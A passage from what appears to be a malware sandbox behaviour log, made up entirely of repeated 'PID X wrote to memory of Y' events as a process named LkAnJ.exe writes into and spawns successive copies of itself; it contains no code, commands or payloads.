LkAnJ.exe 134 PID 1052 wrote to memory of 2012 1052 LkAnJ.exe 134 PID 1052 wrote to memory of 1760 1052 LkAnJ.exe 135 PID 1052 wrote to memory of 1760 1052 LkAnJ.exe 135 PID 1052 wrote to memory of 1760 1052 LkAnJ.exe 135 PID 1052 wrote to memory of 1760 1052 LkAnJ.exe 135 PID 1760 wrote to memory of 1176 1760 LkAnJ.exe 136 PID 1760 wrote to memory of 1176 1760 LkAnJ.exe 136 PID 1760 wrote to memory of 1176 1760 LkAnJ.exe 136 PID 1760 wrote to memory of 1176 1760 LkAnJ.exe 136 PID 1176 wrote to memory of 1312 1176 LkAnJ.exe 137 PID 1176 wrote to memory of 1312 1176 LkAnJ.exe 137 PID 1176 wrote to memory of 1312 1176 LkAnJ.exe 137 PID 1176 wrote to memory of 1312 1176 LkAnJ.exe 137 PID 1176 wrote to memory of 1312 1176 LkAnJ.exe 137 PID 1176 wrote to memory of 1312 1176 LkAnJ.exe 137 PID 1176 wrote to memory of 1576 1176 LkAnJ.exe 138 PID 1176 wrote to memory of 1576 1176 LkAnJ.exe 138 PID 1176 wrote to memory of 1576 1176 LkAnJ.exe 138 PID 1176 wrote to memory of 1576 1176 LkAnJ.exe 138 PID 1176 wrote to memory of 452 1176 LkAnJ.exe 139 PID 1176 wrote to memory of 452 1176 LkAnJ.exe 139 PID 1176 wrote to memory of 452 1176 LkAnJ.exe 139 PID 1176 wrote to memory of 452 1176 LkAnJ.exe 139 PID 452 wrote to memory of 784 452 LkAnJ.exe 140 PID 452 wrote to memory of 784 452 LkAnJ.exe 140 PID 452 wrote to memory of 784 452 LkAnJ.exe 140 PID 452 wrote to memory of 784 452 LkAnJ.exe 140 PID 784 wrote to memory of 1172 784 LkAnJ.exe 141 PID 784 wrote to memory of 1172 784 LkAnJ.exe 141 PID 784 wrote to memory of 1172 784 LkAnJ.exe 141 PID 784 wrote to memory of 1172 784 LkAnJ.exe 141 PID 784 wrote to memory of 1172 784 LkAnJ.exe 141 PID 784 wrote to memory of 1172 784 LkAnJ.exe 141 PID 784 wrote to memory of 1472 784 LkAnJ.exe 142 PID 784 wrote to memory of 1472 784 LkAnJ.exe 142 PID 784 wrote to memory of 1472 784 LkAnJ.exe 142 PID 784 wrote to memory of 1472 784 LkAnJ.exe 142 PID 784 wrote to memory of 1228 784 LkAnJ.exe 143 PID 784 wrote to memory of 1228 784 LkAnJ.exe 143 PID 784 wrote to memory of 1228 784 LkAnJ.exe 143 PID 784 wrote to memory of 1228 784 LkAnJ.exe 143 PID 1228 wrote to memory of 1784 1228 LkAnJ.exe 144 PID 1228 wrote to memory of 1784 1228 LkAnJ.exe 144 PID 1228 wrote to memory of 1784 1228 LkAnJ.exe 144 PID 1228 wrote to memory of 1784 1228 LkAnJ.exe 144 PID 1784 wrote to memory of 288 1784 LkAnJ.exe 145 PID 1784 wrote to memory of 288 1784 LkAnJ.exe 145 PID 1784 wrote to memory of 288 1784 LkAnJ.exe 145 PID 1784 wrote to memory of 288 1784 LkAnJ.exe 145 PID 1784 wrote to memory of 288 1784 LkAnJ.exe 145 PID 1784 wrote to memory of 288 1784 LkAnJ.exe 145 PID 1784 wrote to memory of 1528 1784 LkAnJ.exe 146 PID 1784 wrote to memory of 1528 1784 LkAnJ.exe 146 PID 1784 wrote to memory of 1528 1784 LkAnJ.exe 146 PID 1784 wrote to memory of 1528 1784 LkAnJ.exe 146 PID 1784 wrote to memory of 1412 1784 LkAnJ.exe 147 PID 1784 wrote to memory of 1412 1784 LkAnJ.exe 147 PID 1784 wrote to memory of 1412 1784 LkAnJ.exe 147 PID 1784 wrote to memory of 1412 1784 LkAnJ.exe 147 PID 1412 wrote to memory of 552 1412 LkAnJ.exe 148 PID 1412 wrote to memory of 552 1412 LkAnJ.exe 148 PID 1412 wrote to memory of 552 1412 LkAnJ.exe 148 PID 1412 wrote to memory of 552 1412 LkAnJ.exe 148 PID 552 wrote to memory of 1488 552 LkAnJ.exe 149 PID 552 wrote to memory of 1488 552 LkAnJ.exe 149 PID 552 wrote to memory of 1488 552 LkAnJ.exe 149 PID 552 wrote to memory of 1488 552 LkAnJ.exe 149 PID 552 wrote to memory of 1488 552 LkAnJ.exe 149 PID 552 wrote to memory of 1488 552 LkAnJ.exe 149 PID 552 wrote to memory of 788 552 LkAnJ.exe 150 PID 552 wrote to memory of 788 552 LkAnJ.exe 150 PID 552 wrote to memory of 788 552 LkAnJ.exe 150 PID 552 wrote to memory of 788 552 LkAnJ.exe 150 PID 552 wrote to memory of 340 552 LkAnJ.exe 151 PID 552 wrote to memory of 340 552 LkAnJ.exe 151 PID 552 wrote to memory of 340 552 LkAnJ.exe 151 PID 552 wrote to memory of 340 552 LkAnJ.exe 151 PID 340 wrote to memory of 1616 340 LkAnJ.exe 152 PID 340 wrote to memory of 1616 340 LkAnJ.exe 152 PID 340 wrote to memory of 1616 340 LkAnJ.exe 152 PID 340 wrote to memory of 1616 340 LkAnJ.exe 152 PID 1616 wrote to memory of 1492 1616 LkAnJ.exe 153 PID 1616 wrote to memory of 1492 1616 LkAnJ.exe 153 PID 1616 wrote to memory of 1492 1616 LkAnJ.exe 153 PID 1616 wrote to memory of 1492 1616 LkAnJ.exe 153 PID 1616 wrote to memory of 1492 1616 LkAnJ.exe 153 PID 1616 wrote to memory of 1492 1616 LkAnJ.exe 153 PID 1616 wrote to memory of 1056 1616 LkAnJ.exe 154 PID 1616 wrote to memory of 1056 1616 LkAnJ.exe 154 PID 1616 wrote to memory of 1056 1616 LkAnJ.exe 154 PID 1616 wrote to memory of 1056 1616 LkAnJ.exe 154 PID 1616 wrote to memory of 1772 1616 LkAnJ.exe 155 PID 1616 wrote to memory of 1772 1616 LkAnJ.exe 155 PID 1616 wrote to memory of 1772 1616 LkAnJ.exe 155 PID 1616 wrote to memory of 1772 1616 LkAnJ.exe 155 PID 1772 wrote to memory of 1412 1772 LkAnJ.exe 156 PID 1772 wrote to memory of 1412 1772 LkAnJ.exe 156 PID 1772 wrote to memory of 1412 1772 LkAnJ.exe 156 PID 1772 wrote to memory of 1412 1772 LkAnJ.exe 156 PID 1412 wrote to memory of 1964 1412 LkAnJ.exe 157 PID 1412 wrote to memory of 1964 1412 LkAnJ.exe 157 PID 1412 wrote to memory of 1964 1412 LkAnJ.exe 157 PID 1412 wrote to memory of 1964 1412 LkAnJ.exe 157 PID 1412 wrote to memory of 1964 1412 LkAnJ.exe 157 PID 1412 wrote to memory of 1964 1412 LkAnJ.exe 157 PID 1412 wrote to memory of 480 1412 LkAnJ.exe 158 PID 1412 wrote to memory of 480 1412 LkAnJ.exe 158 PID 1412 wrote to memory of 480 1412 LkAnJ.exe 158 PID 1412 wrote to memory of 480 1412 LkAnJ.exe 158 PID 1412 wrote to memory of 788 1412 LkAnJ.exe 159 PID 1412 wrote to memory of 788 1412 LkAnJ.exe 159 PID 1412 wrote to memory of 788 1412 LkAnJ.exe 159 PID 1412 wrote to memory of 788 1412 LkAnJ.exe 159 PID 788 wrote to memory of 1844 788 LkAnJ.exe 160 PID 788 wrote to memory of 1844 788 LkAnJ.exe 160 PID 788 wrote to memory of 1844 788 LkAnJ.exe 160 PID 788 wrote to memory of 1844 788 LkAnJ.exe 160 PID 1844 wrote to memory of 1528 1844 LkAnJ.exe 161 PID 1844 wrote to memory of 1528 1844 LkAnJ.exe 161 PID 1844 wrote to memory of 1528 1844 LkAnJ.exe 161 PID 1844 wrote to memory of 1528 1844 LkAnJ.exe 161 PID 1844 wrote to memory of 1528 1844 LkAnJ.exe 161 PID 1844 wrote to memory of 1528 1844 LkAnJ.exe 161 PID 1844 wrote to memory of 676 1844 LkAnJ.exe 162 PID 1844 wrote to memory of 676 1844 LkAnJ.exe 162 PID 1844 wrote to memory of 676 1844 LkAnJ.exe 162 PID 1844 wrote to memory of 676 1844 LkAnJ.exe 162 PID 1844 wrote to memory of 2000 1844 LkAnJ.exe 163 PID 1844 wrote to memory of 2000 1844 LkAnJ.exe 163 PID 1844 wrote to memory of 2000 1844 LkAnJ.exe 163 PID 1844 wrote to memory of 2000 1844 LkAnJ.exe 163 PID 2000 wrote to memory of 2020 2000 LkAnJ.exe 164 PID 2000 wrote to memory of 2020 2000 LkAnJ.exe 164 PID 2000 wrote to memory of 2020 2000 LkAnJ.exe 164 PID 2000 wrote to memory of 2020 2000 LkAnJ.exe 164 PID 2020 wrote to memory of 1228 2020 LkAnJ.exe 165 PID 2020 wrote to memory of 1228 2020 LkAnJ.exe 165 PID 2020 wrote to memory of 1228 2020 LkAnJ.exe 165 PID 2020 wrote to memory of 1228 2020 LkAnJ.exe 165 PID 2020 wrote to memory of 1228 2020 LkAnJ.exe 165 PID 2020 wrote to memory of 1228 2020 LkAnJ.exe 165 PID 2020 wrote to memory of 480 2020 LkAnJ.exe 166 PID 2020 wrote to memory of 480 2020 LkAnJ.exe 166 PID 2020 wrote to memory of 480 2020 LkAnJ.exe 166 PID 2020 wrote to memory of 480 2020 LkAnJ.exe 166 PID 2020 wrote to memory of 1160 2020 LkAnJ.exe 167 PID 2020 wrote to memory of 1160 2020 LkAnJ.exe 167 PID 2020 wrote to memory of 1160 2020 LkAnJ.exe 167 PID 2020 wrote to memory of 1160 2020 LkAnJ.exe 167 PID 1160 wrote to memory of 1856 1160 LkAnJ.exe 168 PID 1160 wrote to memory of 1856 1160 LkAnJ.exe 168 PID 1160 wrote to memory of 1856 1160 LkAnJ.exe 168 PID 1160 wrote to memory of 1856 1160 LkAnJ.exe 168 PID 1856 wrote to memory of 1840 1856 LkAnJ.exe 169 PID 1856 wrote to memory of 1840 1856 LkAnJ.exe 169 PID 1856 wrote to memory of 1840 1856 LkAnJ.exe 169 PID 1856 wrote to memory of 1840 1856 LkAnJ.exe 169 PID 1856 wrote to memory of 1840 1856 LkAnJ.exe 169 PID 1856 wrote to memory of 1840 1856 LkAnJ.exe 169 PID 1856 wrote to memory of 1836 1856 LkAnJ.exe 170 PID 1856 wrote to memory of 1836 1856 LkAnJ.exe 170 PID 1856 wrote to memory of 1836 1856 LkAnJ.exe 170 PID 1856 wrote to memory of 1836 1856 LkAnJ.exe 170 PID 1856 wrote to memory of 1632 1856 LkAnJ.exe 171 PID 1856 wrote to memory of 1632 1856 LkAnJ.exe 171 PID 1856 wrote to memory of 1632 1856 LkAnJ.exe 171 PID 1856 wrote to memory of 1632 1856 LkAnJ.exe 171 PID 1632 wrote to memory of 1772 1632 LkAnJ.exe 172 PID 1632 wrote to memory of 1772 1632 LkAnJ.exe 172 PID 1632 wrote to memory of 1772 1632 LkAnJ.exe 172 PID 1632 wrote to memory of 1772 1632 LkAnJ.exe 172 PID 1772 wrote to memory of 324 1772 LkAnJ.exe 173 PID 1772 wrote to memory of 324 1772 LkAnJ.exe 173 PID 1772 wrote to memory of 324 1772 LkAnJ.exe 173 PID 1772 wrote to memory of 324 1772 LkAnJ.exe 173 PID 1772 wrote to memory of 324 1772 LkAnJ.exe 173 PID 1772 wrote to memory of 324 1772 LkAnJ.exe 173 PID 1772 wrote to memory of 1764 1772 LkAnJ.exe 174 PID 1772 wrote to memory of 1764 1772 LkAnJ.exe 174 PID 1772 wrote to memory of 1764 1772 LkAnJ.exe 174 PID 1772 wrote to memory of 1764 1772 LkAnJ.exe 174 PID 1772 wrote to memory of 340 1772 LkAnJ.exe 175 PID 1772 wrote to memory of 340 1772 LkAnJ.exe 175 PID 1772 wrote to memory of 340 1772 LkAnJ.exe 175 PID 1772 wrote to memory of 340 1772 LkAnJ.exe 175 PID 340 wrote to memory of 2064 340 LkAnJ.exe 176 PID 340 wrote to memory of 2064 340 LkAnJ.exe 176 PID 340 wrote to memory of 2064 340 LkAnJ.exe 176 PID 340 wrote to memory of 2064 340 LkAnJ.exe 176 PID 2064 wrote to memory of 2088 2064 LkAnJ.exe 177 PID 2064 wrote to memory of 2088 2064 LkAnJ.exe 177 PID 2064 wrote to memory of 2088 2064 LkAnJ.exe 177 PID 2064 wrote to memory of 2088 2064 LkAnJ.exe 177 PID 2064 wrote to memory of 2088 2064 LkAnJ.exe 177 PID 2064 wrote to memory of 2088 2064 LkAnJ.exe 177 PID 2064 wrote to memory of 2104 2064 LkAnJ.exe 178 PID 2064 wrote to memory of 2104 2064 LkAnJ.exe 178 PID 2064 wrote to memory of 2104 2064 LkAnJ.exe 178 PID 2064 wrote to memory of 2104 2064 LkAnJ.exe 178 PID 2064 wrote to memory of 2128 2064 LkAnJ.exe 179 PID 2064 wrote to memory of 2128 2064 LkAnJ.exe 179 PID 2064 wrote to memory of 2128 2064 LkAnJ.exe 179 PID 2064 wrote to memory of 2128 2064 LkAnJ.exe 179 PID 2128 wrote to memory of 2156 2128 LkAnJ.exe 180 PID 2128 wrote to memory of 2156 2128 LkAnJ.exe 180 PID 2128 wrote to memory of 2156 2128 LkAnJ.exe 180 PID 2128 wrote to memory of 2156 2128 LkAnJ.exe 180 PID 2156 wrote to memory of 2180 2156 LkAnJ.exe 181 PID 2156 wrote to memory of 2180 2156 LkAnJ.exe 181 PID 2156 wrote to memory of 2180 2156 LkAnJ.exe 181 PID 2156 wrote to memory of 2180 2156 LkAnJ.exe 181 PID 2156 wrote to memory of 2180 2156 LkAnJ.exe 181 PID 2156 wrote to memory of 2180 2156 LkAnJ.exe 181 PID 2156 wrote to memory of 2196 2156 LkAnJ.exe 182 PID 2156 wrote to memory of 2196 2156 LkAnJ.exe 182 PID 2156 wrote to memory of 2196 2156 LkAnJ.exe 182 PID 2156 wrote to memory of 2196 2156 LkAnJ.exe 182 PID 2156 wrote to memory of 2220 2156 LkAnJ.exe 183 PID 2156 wrote to memory of 2220 2156 LkAnJ.exe 183 PID 2156 wrote to memory of 2220 2156 LkAnJ.exe 183 PID 2156 wrote to memory of 2220 2156 LkAnJ.exe 183 PID 2220 wrote to memory of 2248 2220 LkAnJ.exe 184 PID 2220 wrote to memory of 2248 2220 LkAnJ.exe 184 PID 2220 wrote to memory of 2248 2220 LkAnJ.exe 184 PID 2220 wrote to memory of 2248 2220 LkAnJ.exe 184 PID 2248 wrote to memory of 2272 2248 LkAnJ.exe 185 PID 2248 wrote to memory of 2272 2248 LkAnJ.exe 185 PID 2248 wrote to memory of 2272 2248 LkAnJ.exe 185 PID 2248 wrote to memory of 2272 2248 LkAnJ.exe 185 PID 2248 wrote to memory of 2272 2248 LkAnJ.exe 185 PID 2248 wrote to memory of 2272 2248 LkAnJ.exe 185 PID 2248 wrote to memory of 2288 2248 LkAnJ.exe 186 PID 2248 wrote to memory of 2288 2248 LkAnJ.exe 186 PID 2248 wrote to memory of 2288 2248 LkAnJ.exe 186 PID 2248 wrote to memory of 2288 2248 LkAnJ.exe 186 PID 2248 wrote to memory of 2312 2248 LkAnJ.exe 187 PID 2248 wrote to memory of 2312 2248 LkAnJ.exe 187 PID 2248 wrote to memory of 2312 2248 LkAnJ.exe 187 PID 2248 wrote to memory of 2312 2248 LkAnJ.exe 187 PID 2312 wrote to memory of 2436 2312 LkAnJ.exe 190 PID 2312 wrote to memory of 2436 2312 LkAnJ.exe 190 PID 2312 wrote to memory of 2436 2312 LkAnJ.exe 190 PID 2312 wrote to memory of 2436 2312 LkAnJ.exe 190 PID 2436 wrote to memory of 2460 2436 LkAnJ.exe 191 PID 2436 wrote to memory of 2460 2436 LkAnJ.exe 191 PID 2436 wrote to memory of 2460 2436 LkAnJ.exe 191 PID 2436 wrote to memory of 2460 2436 LkAnJ.exe 191 PID 2436 wrote to memory of 2460 2436 LkAnJ.exe 191 PID 2436 wrote to memory of 2460 2436 LkAnJ.exe 191 PID 2436 wrote to memory of 2476 2436 LkAnJ.exe 192 PID 2436 wrote to memory of 2476 2436 LkAnJ.exe 192 PID 2436 wrote to memory of 2476 2436 LkAnJ.exe 192 PID 2436 wrote to memory of 2476 2436 LkAnJ.exe 192 PID 2436 wrote to memory of 2500 2436 LkAnJ.exe 193 PID 2436 wrote to memory of 2500 2436 LkAnJ.exe 193 PID 2436 wrote to memory of 2500 2436 LkAnJ.exe 193 PID 2436 wrote to memory of 2500 2436 LkAnJ.exe 193 PID 2500 wrote to memory of 2532 2500 LkAnJ.exe 194 PID 2500 wrote to memory of 2532 2500 LkAnJ.exe 194 PID 2500 wrote to memory of 2532 2500 LkAnJ.exe 194 PID 2500 wrote to memory of 2532 2500 LkAnJ.exe 194 PID 2532 wrote to memory of 2556 2532 LkAnJ.exe 195 PID 2532 wrote to memory of 2556 2532 LkAnJ.exe 195 PID 2532 wrote to memory of 2556 2532 LkAnJ.exe 195 PID 2532 wrote to memory of 2556 2532 LkAnJ.exe 195 PID 2532 wrote to memory of 2556 2532 LkAnJ.exe 195 PID 2532 wrote to memory of 2556 2532 LkAnJ.exe 195 PID 2532 wrote to memory of 2572 2532 LkAnJ.exe 196 PID 2532 wrote to memory of 2572 2532 LkAnJ.exe 196 PID 2532 wrote to memory of 2572 2532 LkAnJ.exe 196 PID 2532 wrote to memory of 2572 2532 LkAnJ.exe 196 PID 2532 wrote to memory of 2592 2532 LkAnJ.exe 197 PID 2532 wrote to memory of 2592 2532 LkAnJ.exe 197 PID 2532 wrote to memory of 2592 2532 LkAnJ.exe 197 PID 2532 wrote to memory of 2592 2532 LkAnJ.exe 197 PID 2592 wrote to memory of 2632 2592 LkAnJ.exe 198 PID 2592 wrote to memory of 2632 2592 LkAnJ.exe 198 PID 2592 wrote to memory of 2632 2592 LkAnJ.exe 198 PID 2592 wrote to memory of 2632 2592 LkAnJ.exe 198 PID 2632 wrote to memory of 2656 2632 LkAnJ.exe 199 PID 2632 wrote to memory of 2656 2632 LkAnJ.exe 199 PID 2632 wrote to memory of 2656 2632 LkAnJ.exe 199 PID 2632 wrote to memory of 2656 2632 LkAnJ.exe 199 PID 2632 wrote to memory of 2656 2632 LkAnJ.exe 199 PID 2632 wrote to memory of 2656 2632 LkAnJ.exe 199 PID 2632 wrote to memory of 2672 2632 LkAnJ.exe 200 PID 2632 wrote to memory of 2672 2632 LkAnJ.exe 200 PID 2632 wrote to memory of 2672 2632 LkAnJ.exe 200 PID 2632 wrote to memory of 2672 2632 LkAnJ.exe 200 PID 2632 wrote to memory of 2696 2632 LkAnJ.exe 201 PID 2632 wrote to memory of 2696 2632 LkAnJ.exe 201 PID 2632 wrote to memory of 2696 2632 LkAnJ.exe 201 PID 2632 wrote to memory of 2696 2632 LkAnJ.exe 201 PID 2696 wrote to memory of 2724 2696 LkAnJ.exe 202 PID 2696 wrote to memory of 2724 2696 LkAnJ.exe 202 PID 2696 wrote to memory of 2724 2696 LkAnJ.exe 202 PID 2696 wrote to memory of 2724 2696 LkAnJ.exe 202 PID 2724 wrote to memory of 2748 2724 LkAnJ.exe 203 PID 2724 wrote to memory of 2748 2724 LkAnJ.exe 203 PID 2724 wrote to memory of 2748 2724 LkAnJ.exe 203 PID 2724 wrote to memory of 2748 2724 LkAnJ.exe 203 PID 2724 wrote to memory of 2748 2724 LkAnJ.exe 203 PID 2724 wrote to memory of 2748 2724 LkAnJ.exe 203 PID 2724 wrote to memory of 2764 2724 LkAnJ.exe 204 PID 2724 wrote to memory of 2764 2724 LkAnJ.exe 204 PID 2724 wrote to memory of 2764 2724 LkAnJ.exe 204 PID 2724 wrote to memory of 2764 2724 LkAnJ.exe 204 PID 2724 wrote to memory of 2788 2724 LkAnJ.exe 205 PID 2724 wrote to memory of 2788 2724 LkAnJ.exe 205 PID 2724 wrote to memory of 2788 2724 LkAnJ.exe 205 PID 2724 wrote to memory of 2788 2724 LkAnJ.exe 205 PID 2788 wrote to memory of 2816 2788 LkAnJ.exe 206 PID 2788 wrote to memory of 2816 2788 LkAnJ.exe 206 PID 2788 wrote to memory of 2816 2788 LkAnJ.exe 206 PID 2788 wrote to memory of 2816 2788 LkAnJ.exe 206 PID 2816 wrote to memory of 2840 2816 LkAnJ.exe 207 PID 2816 wrote to memory of 2840 2816 LkAnJ.exe 207 PID 2816 wrote to memory of 2840 2816 LkAnJ.exe 207 PID 2816 wrote to memory of 2840 2816 LkAnJ.exe 207 PID 2816 wrote to memory of 2840 2816 LkAnJ.exe 207 PID 2816 wrote to memory of 2840 2816 LkAnJ.exe 207 PID 2816 wrote to memory of 2856 2816 LkAnJ.exe 208 PID 2816 wrote to memory of 2856 2816 LkAnJ.exe 208 PID 2816 wrote to memory of 2856 2816 LkAnJ.exe 208 PID 2816 wrote to memory of 2856 2816 LkAnJ.exe 208 PID 2816 wrote to memory of 2876 2816 LkAnJ.exe 209 PID 2816 wrote to memory of 2876 2816 LkAnJ.exe 209 PID 2816 wrote to memory of 2876 2816 LkAnJ.exe 209 PID 2816 wrote to memory of 2876 2816 LkAnJ.exe 209 PID 2876 wrote to memory of 2908 2876 LkAnJ.exe 210 PID 2876 wrote to memory of 2908 2876 LkAnJ.exe 210 PID 2876 wrote to memory of 2908 2876 LkAnJ.exe 210 PID 2876 wrote to memory of 2908 2876 LkAnJ.exe 210 PID 2908 wrote to memory of 2932 2908 LkAnJ.exe 211 PID 2908 wrote to memory of 2932 2908 LkAnJ.exe 211 PID 2908 wrote to memory of 2932 2908 LkAnJ.exe 211 PID 2908 wrote to memory of 2932 2908 LkAnJ.exe 211 PID 2908 wrote to memory of 2932 2908 LkAnJ.exe 211 PID 2908 wrote to memory of 2932 2908 LkAnJ.exe 211 PID 2908 wrote to memory of 2948 2908 LkAnJ.exe 212 PID 2908 wrote to memory of 2948 2908 LkAnJ.exe 212 PID 2908 wrote to memory of 2948 2908 LkAnJ.exe 212 PID 2908 wrote to memory of 2948 2908 LkAnJ.exe 212 PID 2908 wrote to memory of 2968 2908 LkAnJ.exe 213 PID 2908 wrote to memory of 2968 2908 LkAnJ.exe 213 PID 2908 wrote to memory of 2968 2908 LkAnJ.exe 213 PID 2908 wrote to memory of 2968 2908 LkAnJ.exe 213 PID 2968 wrote to memory of 3000 2968 LkAnJ.exe 214 PID 2968 wrote to memory of 3000 2968 LkAnJ.exe 214 PID 2968 wrote to memory of 3000 2968 LkAnJ.exe 214 PID 2968 wrote to memory of 3000 2968 LkAnJ.exe 214 PID 3000 wrote to memory of 3024 3000 LkAnJ.exe 215 PID 3000 wrote to memory of 3024 3000 LkAnJ.exe 215 PID 3000 wrote to memory of 3024 3000 LkAnJ.exe 215 PID 3000 wrote to memory of 3024 3000 LkAnJ.exe 215 PID 3000 wrote to memory of 3024 3000 LkAnJ.exe 215 PID 3000 wrote to memory of 3024 3000 LkAnJ.exe 215 PID 3000 wrote to memory of 3040 3000 LkAnJ.exe 216 PID 3000 wrote to memory of 3040 3000 LkAnJ.exe 216 PID 3000 wrote to memory of 3040 3000 LkAnJ.exe 216 PID 3000 wrote to memory of 3040 3000 LkAnJ.exe 216 PID 3000 wrote to memory of 3064 3000 LkAnJ.exe 217 PID 3000 wrote to memory of 3064 3000 LkAnJ.exe 217 PID 3000 wrote to memory of 3064 3000 LkAnJ.exe 217 PID 3000 wrote to memory of 3064 3000 LkAnJ.exe 217 PID 3064 wrote to memory of 324 3064 LkAnJ.exe 218 PID 3064 wrote to memory of 324 3064 LkAnJ.exe 218 PID 3064 wrote to memory of 324 3064 LkAnJ.exe 218 PID 3064 wrote to memory of 324 3064 LkAnJ.exe 218 PID 324 wrote to memory of 1228 324 LkAnJ.exe 219 PID 324 wrote to memory of 1228 324 LkAnJ.exe 219 PID 324 wrote to memory of 1228 324 LkAnJ.exe 219 PID 324 wrote to memory of 1228 324 LkAnJ.exe 219 PID 324 wrote to memory of 1228 324 LkAnJ.exe 219 PID 324 wrote to memory of 1228 324 LkAnJ.exe 219 PID 324 wrote to memory of 520 324 LkAnJ.exe 220 PID 324 wrote to memory of 520 324 LkAnJ.exe 220 PID 324 wrote to memory of 520 324 LkAnJ.exe 220 PID 324 wrote to memory of 520 324 LkAnJ.exe 220 PID 324 wrote to memory of 2096 324 LkAnJ.exe 221 PID 324 wrote to memory of 2096 324 LkAnJ.exe 221 PID 324 wrote to memory of 2096 324 LkAnJ.exe 221 PID 324 wrote to memory of 2096 324 LkAnJ.exe 221 PID 2096 wrote to memory of 2148 2096 LkAnJ.exe 222 PID 2096 wrote to memory of 2148 2096 LkAnJ.exe 222 PID 2096 wrote to memory of 2148 2096 LkAnJ.exe 222 PID 2096 wrote to memory of 2148 2096 LkAnJ.exe 222 PID 2148 wrote to memory of 2152 2148 LkAnJ.exe 223 PID 2148 wrote to memory of 2152 2148 LkAnJ.exe 223 PID 2148 wrote to memory of 2152 2148 LkAnJ.exe 223 PID 2148 wrote to memory of 2152 2148 LkAnJ.exe 223 PID 2148 wrote to memory of 2152 2148 LkAnJ.exe 223 PID 2148 wrote to memory of 2152 2148 LkAnJ.exe 223 PID 2148 wrote to memory of 2172 2148 LkAnJ.exe 224 PID 2148 wrote to memory of 2172 2148 LkAnJ.exe 224 PID 2148 wrote to memory of 2172 2148 LkAnJ.exe 224 PID 2148 wrote to memory of 2172 2148 LkAnJ.exe 224 PID 2148 wrote to memory of 2160 2148 LkAnJ.exe 225 PID 2148 wrote to memory of 2160 2148 LkAnJ.exe 225 PID 2148 wrote to memory of 2160 2148 LkAnJ.exe 225 PID 2148 wrote to memory of 2160 2148 LkAnJ.exe 225 PID 2160 wrote to memory of 2240 2160 LkAnJ.exe 226 PID 2160 wrote to memory of 2240 2160 LkAnJ.exe 226 PID 2160 wrote to memory of 2240 2160 LkAnJ.exe 226 PID 2160 wrote to memory of 2240 2160 LkAnJ.exe 226 PID 2240 wrote to memory of 2224 2240 LkAnJ.exe 227 PID 2240 wrote to memory of 2224 2240 LkAnJ.exe 227 PID 2240 wrote to memory of 2224 2240 LkAnJ.exe 227 PID 2240 wrote to memory of 2224 2240 LkAnJ.exe 227 PID 2240 wrote to memory of 2224 2240 LkAnJ.exe 227 PID 2240 wrote to memory of 2224 2240 LkAnJ.exe 227 PID 2240 wrote to memory of 2264 2240 LkAnJ.exe 228 PID 2240 wrote to memory of 2264 2240 LkAnJ.exe 228 PID 2240 wrote to memory of 2264 2240 LkAnJ.exe 228 PID 2240 wrote to memory of 2264 2240 LkAnJ.exe 228 PID 2240 wrote to memory of 2268 2240 LkAnJ.exe 229 PID 2240 wrote to memory of 2268 2240 LkAnJ.exe 229 PID 2240 wrote to memory of 2268 2240 LkAnJ.exe 229 PID 2240 wrote to memory of 2268 2240 LkAnJ.exe 229 PID 2268 wrote to memory of 2292 2268 LkAnJ.exe 230 PID 2268 wrote to memory of 2292 2268 LkAnJ.exe 230 PID 2268 wrote to memory of 2292 2268 LkAnJ.exe 230 PID 2268 wrote to memory of 2292 2268 LkAnJ.exe 230 PID 2292 wrote to memory of 2452 2292 LkAnJ.exe 231 PID 2292 wrote to memory of 2452 2292 LkAnJ.exe 231 PID 2292 wrote to memory of 2452 2292 LkAnJ.exe 231 PID 2292 wrote to memory of 2452 2292 LkAnJ.exe 231 PID 2292 wrote to memory of 2452 2292 LkAnJ.exe 231 PID 2292 wrote to memory of 2452 2292 LkAnJ.exe 231 PID 2292 wrote to memory of 2516 2292 LkAnJ.exe 232 PID 2292 wrote to memory of 2516 2292 LkAnJ.exe 232 PID 2292 wrote to memory of 2516 2292 LkAnJ.exe 232 PID 2292 wrote to memory of 2516 2292 LkAnJ.exe 232 PID 2292 wrote to memory of 2440 2292 LkAnJ.exe 233 PID 2292 wrote to memory of 2440 2292 LkAnJ.exe 233 PID 2292 wrote to memory of 2440 2292 LkAnJ.exe 233 PID 2292 wrote to memory of 2440 2292 LkAnJ.exe 233 PID 2440 wrote to memory of 2480 2440 LkAnJ.exe 234 PID 2440 wrote to memory of 2480 2440 LkAnJ.exe 234 PID 2440 wrote to memory of 2480 2440 LkAnJ.exe 234 PID 2440 wrote to memory of 2480 2440 LkAnJ.exe 234 PID 2480 wrote to memory of 2540 2480 LkAnJ.exe 235 PID 2480 wrote to memory of 2540 2480 LkAnJ.exe 235 PID 2480 wrote to memory of 2540 2480 LkAnJ.exe 235 PID 2480 wrote to memory of 2540 2480 LkAnJ.exe 235 PID 2480 wrote to memory of 2540 2480 LkAnJ.exe 235 PID 2480 wrote to memory of 2540 2480 LkAnJ.exe 235 PID 2480 wrote to memory of 2536 2480 LkAnJ.exe 236 PID 2480 wrote to memory of 2536 2480 LkAnJ.exe 236 PID 2480 wrote to memory of 2536 2480 LkAnJ.exe 236 PID 2480 wrote to memory of 2536 2480 LkAnJ.exe 236 PID 2480 wrote to memory of 2560 2480 LkAnJ.exe 237 PID 2480 wrote to memory of 2560 2480 LkAnJ.exe 237 PID 2480 wrote to memory of 2560 2480 LkAnJ.exe 237 PID 2480 wrote to memory of 2560 2480 LkAnJ.exe 237 PID 2560 wrote to memory of 2592 2560 LkAnJ.exe 238 PID 2560 wrote to memory of 2592 2560 LkAnJ.exe 238 PID 2560 wrote to memory of 2592 2560 LkAnJ.exe 238 PID 2560 wrote to memory of 2592 2560 LkAnJ.exe 238 PID 2592 wrote to memory of 2684 2592 LkAnJ.exe 239 PID 2592 wrote to memory of 2684 2592 LkAnJ.exe 239 PID 2592 wrote to memory of 2684 2592 LkAnJ.exe 239 PID 2592 wrote to memory of 2684 2592 LkAnJ.exe 239 PID 2592 wrote to memory of 2684 2592 LkAnJ.exe 239 PID 2592 wrote to memory of 2684 2592 LkAnJ.exe 239 PID 2592 wrote to memory of 2716 2592 LkAnJ.exe 240 PID 2592 wrote to memory of 2716 2592 LkAnJ.exe 240 PID 2592 wrote to memory of 2716 2592 LkAnJ.exe 240 PID 2592 wrote to memory of 2716 2592 LkAnJ.exe 240 PID 2592 wrote to memory of 2732 2592 LkAnJ.exe 241 PID 2592 wrote to memory of 2732 2592 LkAnJ.exe 241 PID 2592 wrote to memory of 2732 2592 LkAnJ.exe 241 PID 2592 wrote to memory of 2732 2592 LkAnJ.exe 241 PID 2732 wrote to memory of 392 2732 